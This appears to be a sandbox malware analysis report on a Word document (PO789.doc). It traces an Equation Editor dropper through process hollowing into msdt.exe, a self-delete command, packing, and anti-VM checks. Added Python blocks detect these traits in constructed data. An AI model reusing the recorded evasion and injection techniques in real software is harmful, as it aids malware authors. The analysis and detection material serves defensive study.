          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000985F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000986A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_00098720 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000987D0 NtAllocateVirtualMemory,
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and write
          Source: PO789.docVirustotal: Detection: 57%
          Source: PO789.docReversingLabs: Detection: 53%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
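The process chain recorded above is the whole infection in five parent/child relationships: EQNEDT32.EXE launching medicomsh78694.exe out of the user's AppData\Roaming directory, that binary relaunching itself (the command line the report shows is the literal string {path}), explorer.exe starting a bare C:\Windows\SysWOW64\msdt.exe with no arguments, and msdt.exe finally running cmd.exe /c del against the dropper. Each relationship is detectable on its own from process-creation telemetry. The Python below is an added example, not part of the Joe Sandbox report: it encodes the five relationships as independent rules and runs them over a constructed Sysmon-style event list built from the report's own image paths and command lines. The PIDs, the field names and the explorer.exe parent record are assumptions; the report only shows parent and child images.

```python
"""Added example: rules for the parent/child chain this report records, run over
constructed Sysmon-style process-creation events (field names and PIDs assumed)."""
import re

# Constructed from the "Process created" lines of the report. Only the image
# paths and command lines are taken from it; pid/ppid values are invented.
EVENTS = [
    {"pid": 1, "ppid": 0, "parent": "",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'},
    {"pid": 2, "ppid": 0, "parent": "",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 4, "ppid": 2,
     "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Users\user\AppData\Roaming\medicomsh78694.exe",
     "cmd": r"C:\Users\user\AppData\Roaming\medicomsh78694.exe"},
    {"pid": 5, "ppid": 4,
     "parent": r"C:\Users\user\AppData\Roaming\medicomsh78694.exe",
     "image": r"C:\Users\user\AppData\Roaming\medicomsh78694.exe",
     "cmd": "{path}"},
    {"pid": 7, "ppid": 6, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\SysWOW64\msdt.exe",
     "cmd": r"C:\Windows\SysWOW64\msdt.exe"},
    {"pid": 8, "ppid": 7, "parent": r"C:\Windows\SysWOW64\msdt.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"'},
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
DEL_CMD = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)
SYSWOW64 = "c:\\windows\\syswow64\\"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) pairs; rules fire independently so a partial chain still shows."""
    hits, dropped = [], set()
    for ev in events:
        parent, image, cmd = ev["parent"], ev["image"], ev["cmd"]
        # Equation Editor has no business creating processes at all.
        if basename(parent) == "eqnedt32.exe":
            hits.append(("equation_editor_spawns_process", ev["pid"]))
        # Office component running an executable from a user-writable directory.
        if basename(parent) in OFFICE_IMAGES and USER_WRITABLE.search(image):
            hits.append(("office_runs_exe_from_appdata", ev["pid"]))
            dropped.add(image.lower())
        # Same image as parent: the RunPE / hollowing pattern (weak on its own).
        if parent and parent.lower() == image.lower():
            hits.append(("self_spawn_hollowing_candidate", ev["pid"]))
        # explorer.exe starting a 32-bit system tool with an empty argument list.
        if (basename(parent) == "explorer.exe"
                and image.lower().startswith(SYSWOW64)
                and cmd.strip().lower() == image.lower()):
            hits.append(("explorer_spawns_bare_syswow64_binary", ev["pid"]))
        # cmd /c del of a binary that an earlier rule saw being dropped and run.
        if basename(image) == "cmd.exe":
            m = DEL_CMD.search(cmd)
            if m and m.group(1).lower() in dropped:
                hits.append(("dropper_self_delete", ev["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print("%-40s pid %d" % (rule, pid))
```

In production the event list would come from Sysmon Event ID 1 or an EDR's process-creation stream; the self-spawn rule by itself is noisy (installers and updaters relaunch themselves), but together with an Office parent and a user-writable path it is the hollowing pattern the report flags, and the self-delete rule keys off the path the earlier rule recorded rather than matching every cmd /c del.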
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$PO789.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/9@6/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr | OLE document summary: title field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr | OLE document summary: author field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr | OLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
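The two debug-string lines above place ntdll's PDB name (wntdll.pdb) inside medicomsh78694.exe at dump bases 0xBA0000 and 0xD20000 and msdt's PDB name (msdt.pdb) at 0x2700000, and the Nt* stubs the report resolves for process 5 (NtReadFile, NtMapViewOfSection, NtUnmapViewOfSection, NtCreateSection and the rest, at 0xBAF900 through 0xBB1148) fall inside the first of those regions rather than in the ntdll image the loader mapped. If the 00000040 field in those dump names is read as the page protection, the regions are PAGE_EXECUTE_READWRITE. That layout is consistent with the sample calling system services through a private, freshly mapped copy of ntdll so that user-mode hooks on the real one are never executed, and staging the msdt.exe image it later hollows; the msdt.exe process then resolves the full hollowing and APC-injection set (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtQueueApcThread, NtResumeThread) the Code function lines list. The Python below is an added example, not sandbox output: a memory-snapshot check that parses CodeView RSDS debug records, reports ntdll copies that do not sit at the loaded ntdll base, and maps the resolved Nt* names onto the steps of a hollowing chain. The snapshot is constructed; the three region bases come from the report's dump names, while the real ntdll base, the other protection values and the PDB GUID are assumptions.

```python
"""Added example: find a privately mapped second ntdll.dll in a process snapshot
via CodeView RSDS records, and map resolved Nt* names onto hollowing steps."""
import struct
import uuid

PAGE_EXECUTE_READWRITE = 0x40


def find_pdb_records(blob):
    """Return (offset, guid, age, pdb_path) for each 'RSDS' CodeView record in blob."""
    records = []
    pos = blob.find(b"RSDS")
    while pos != -1:
        end = blob.find(b"\x00", pos + 24)  # layout: RSDS + GUID(16) + age(4) + path\0
        if end != -1:
            guid = uuid.UUID(bytes_le=blob[pos + 4:pos + 20])
            age = struct.unpack_from("<I", blob, pos + 20)[0]
            records.append((pos, str(guid), age, blob[pos + 24:end].decode("ascii", "replace")))
        pos = blob.find(b"RSDS", pos + 4)
    return records


def find_rogue_ntdll(regions, loaded_ntdll_base):
    """Regions carrying ntdll's PDB name whose base is not the loader-mapped ntdll."""
    rogue = []
    for base, protect, data in regions:
        for _, _, _, pdb in find_pdb_records(data):
            if pdb.lower().endswith("ntdll.pdb") and base != loaded_ntdll_base:
                rogue.append({"base": base, "pdb": pdb, "rwx": protect == PAGE_EXECUTE_READWRITE})
    return rogue


# Nt* services a hollowing / APC-injection chain needs, grouped by step; the
# names are the ones this report resolves inside msdt.exe and medicomsh78694.exe.
HOLLOWING_STEPS = {
    "create target": {"NtCreateProcessEx", "NtCreateSection"},
    "carve out image": {"NtUnmapViewOfSection"},
    "place payload": {"NtAllocateVirtualMemory", "NtMapViewOfSection",
                      "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
    "redirect thread": {"NtGetContextThread", "NtSetContextThread", "NtQueueApcThread"},
    "run it": {"NtResumeThread"},
}


def hollowing_coverage(resolved_names):
    """For each step, the Nt* services the sample resolved; an empty list is a gap."""
    resolved = set(resolved_names)
    return {step: sorted(resolved & names) for step, names in HOLLOWING_STEPS.items()}


def build_region(pdb_name):
    """Constructed image fragment: MZ stub, padding, one RSDS record (GUID and age invented)."""
    rec = (b"RSDS" + uuid.UUID(int=0x0123456789abcdef0123456789abcdef).bytes_le
           + struct.pack("<I", 2) + pdb_name.encode() + b"\x00")
    return b"MZ" + b"\xcc" * 62 + rec + b"\xcc" * 16


LOADED_NTDLL_BASE = 0x77E80000  # assumption: where the loader put ntdll in this process

# Snapshot constructed for the example. 0xBA0000, 0xD20000 and 0x2700000 are the dump
# bases the report gives for wntdll.pdb / msdt.pdb in medicomsh78694.exe; the 0x40
# protection is read from the same dump names, everything else is assumed.
REGIONS = [
    (LOADED_NTDLL_BASE, 0x20, build_region("wntdll.pdb")),
    (0x00BA0000, PAGE_EXECUTE_READWRITE, build_region("wntdll.pdb")),
    (0x00D20000, PAGE_EXECUTE_READWRITE, build_region("wntdll.pdb")),
    (0x02700000, PAGE_EXECUTE_READWRITE, build_region("msdt.pdb")),
]

# Nt* names the report lists as resolved by msdt.exe (process 7).
RESOLVED_IN_MSDT = [
    "NtCreateFile", "NtCreateMutant", "NtAllocateVirtualMemory", "NtQueryInformationProcess",
    "NtQueryValueKey", "NtCreateKey", "NtFreeVirtualMemory", "NtQueryInformationToken",
    "NtReadFile", "NtClose", "NtAdjustPrivilegesToken", "NtCreateSection", "NtMapViewOfSection",
    "NtQuerySystemInformation", "NtDelayExecution", "NtProtectVirtualMemory", "NtResumeThread",
    "NtQuerySection", "NtOpenProcessToken", "NtOpenThread", "NtOpenDirectoryObject",
    "NtSetValueKey", "NtEnumerateValueKey", "NtQueryInformationFile", "NtQueryVirtualMemory",
    "NtWaitForSingleObject", "NtWriteFile", "NtSetContextThread", "NtWriteVirtualMemory",
    "NtReadVirtualMemory", "NtQueueApcThread", "NtCreateProcessEx", "NtSetInformationFile",
    "NtGetContextThread", "NtOpenProcess", "NtUnmapViewOfSection", "NtEnumerateKey",
    "NtSuspendThread",
]

if __name__ == "__main__":
    for r in find_rogue_ntdll(REGIONS, LOADED_NTDLL_BASE):
        print("second ntdll copy at 0x%08X (%s, rwx=%s)" % (r["base"], r["pdb"], r["rwx"]))
    for step, names in hollowing_coverage(RESOLVED_IN_MSDT).items():
        print("%-16s %s" % (step, ", ".join(names) or "MISSING"))
```

On a live system the region list would come from VirtualQueryEx over the target and the loaded ntdll base from the PEB module list; a second image with ntdll's PDB name in private executable memory has no legitimate reason to exist, which makes this a low-noise check even before the hollowing APIs are observed.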
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: medicomzx[1].exe.2.dr, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: medicomsh78694.exe.2.dr, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037AAA8 push eax; retn 0036h
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037EB30 push ebx; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037ABC8 push esp; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037B558 push eax; retf 0036h
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B832 push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B83B push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B89C push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041C940 push dword ptr [D38E3050h]; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00409BCE push edx; retf
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00413FD9 push edx; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0040B7F3 push ebp; iretd
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_025FDFA1 push ecx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.16750619992
          Source: initial sample | Static PE information: section name: .text entropy: 7.16750619992
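Two of the static indicators listed above are cheap to reproduce and worth keeping in any triage pipeline. A .text entropy of 7.1675 bits per byte is far above what a compiler emits for plain machine code and means the section holds compressed or encrypted content, which matches the AppDomain::Load(byte[]) unpacker found in MainForm.cs: the real payload is a byte array decoded at run time. The push eax; retn, push dword ptr [mem]; ret and push ebp; iretd sequences are return-based jumps that break linear disassembly and function-boundary heuristics. The Python below is an added example, not tooling from the report: it walks the PE section table, computes Shannon entropy per section, and scans raw code bytes for exactly the push/ret forms listed. The PE image and the code bytes are constructed inside the block, and the 7.0 threshold is an assumption.

```python
"""Added example: the two static packer indicators from this report, recomputed
from a PE image: per-section Shannon entropy and push/ret control-flow stubs."""
import math
import struct
from collections import Counter

PACKED_THRESHOLD = 7.0  # assumption; compiler-emitted .text normally sits well below this


def shannon_entropy(data):
    """Bits per byte, from 0.0 (one byte value) to 8.0 (all 256 values equally often)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image):
    """Minimal walk of the PE section table; returns [(name, raw_bytes), ...]."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    off = e_lfanew + 24 + opt_size  # first IMAGE_SECTION_HEADER follows the optional header
    sections = []
    for _ in range(nsect):
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
        off += 40
    return sections


def packed_sections(image, threshold=PACKED_THRESHOLD):
    """(name, entropy) for every section at or above the threshold."""
    out = []
    for name, data in pe_sections(image):
        h = round(shannon_entropy(data), 3)
        if h >= threshold:
            out.append((name, h))
    return out


# opcode -> (mnemonic, immediate length) for the return forms the report lists
RET_FORMS = {0xC3: ("ret", 0), 0xC2: ("retn", 2), 0xCB: ("retf", 0), 0xCA: ("retf", 2), 0xCF: ("iretd", 0)}


def push_ret_stubs(code, base=0):
    """Offsets of 'push r32' (50..57) or 'push dword ptr [imm32]' (FF 35) directly followed by a ret form."""
    hits, i = [], 0
    while i < len(code):
        if 0x50 <= code[i] <= 0x57:
            nxt, length, what = i + 1, 1, "push reg"
        elif code[i] == 0xFF and i + 5 < len(code) and code[i + 1] == 0x35:
            nxt, length, what = i + 6, 6, "push [mem]"
        else:
            i += 1
            continue
        if nxt < len(code) and code[nxt] in RET_FORMS:
            mnem, imm_len = RET_FORMS[code[nxt]]
            if imm_len and nxt + 1 + imm_len <= len(code):
                mnem += " %04Xh" % struct.unpack_from("<H", code, nxt + 1)[0]
            hits.append((base + i, what + "; " + mnem))
        i += length
    return hits


def build_sample_pe():
    """Constructed two-section PE: .text holds every byte value equally often (as packed or
    encrypted code would), .data holds repetitive ASCII. Header fields not needed here are zero."""
    text = bytes(range(256)) * 16
    data = b"plain ASCII configuration text\r\n" * 64
    e_lfanew, nsect = 0x40, 2
    text_off = 0x200
    data_off = text_off + len(text)
    img = bytearray(data_off + len(data))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # COFF header: Machine, NumberOfSections, stamp, symtab, nsyms, SizeOfOptionalHeader=0, flags
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x14C, nsect, 0, 0, 0, 0, 0)
    for k, (name, off, blob) in enumerate([(b".text", text_off, text), (b".data", data_off, data)]):
        hdr = e_lfanew + 24 + 40 * k
        img[hdr:hdr + 8] = name.ljust(8, b"\0")
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        struct.pack_into("<IIII", img, hdr + 8, len(blob), 0x1000 * (k + 1), len(blob), off)
        img[off:off + len(blob)] = blob
    return bytes(img)


# Constructed code bytes: a normal prologue (push ebp; mov ebp,esp is not a stub) followed by
# push eax; retn 0036h / push ebx; ret / push dword ptr [D38E3050h]; ret / push ebp; iretd
SAMPLE_CODE = bytes.fromhex("8bff558bec" "50c23600" "53c3" "ff3550308ed3c3" "55cf" "90")

if __name__ == "__main__":
    print(packed_sections(build_sample_pe()))
    for off, text in push_ret_stubs(SAMPLE_CODE, base=0x401000):
        print("%08X  %s" % (off, text))
```

The section walk deliberately ignores the optional header beyond its size field, so it works on both PE32 and PE32+ files; for real samples the entropy check should be read per section, since a packed binary typically shows one near-8 section next to an almost empty .text, and the push/ret scan is only a hint until the disassembler confirms those bytes are reached.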
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (49 identical rows)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (3 identical rows)
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process information set: NOOPENFILEERRORBOX (23 identical rows)
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
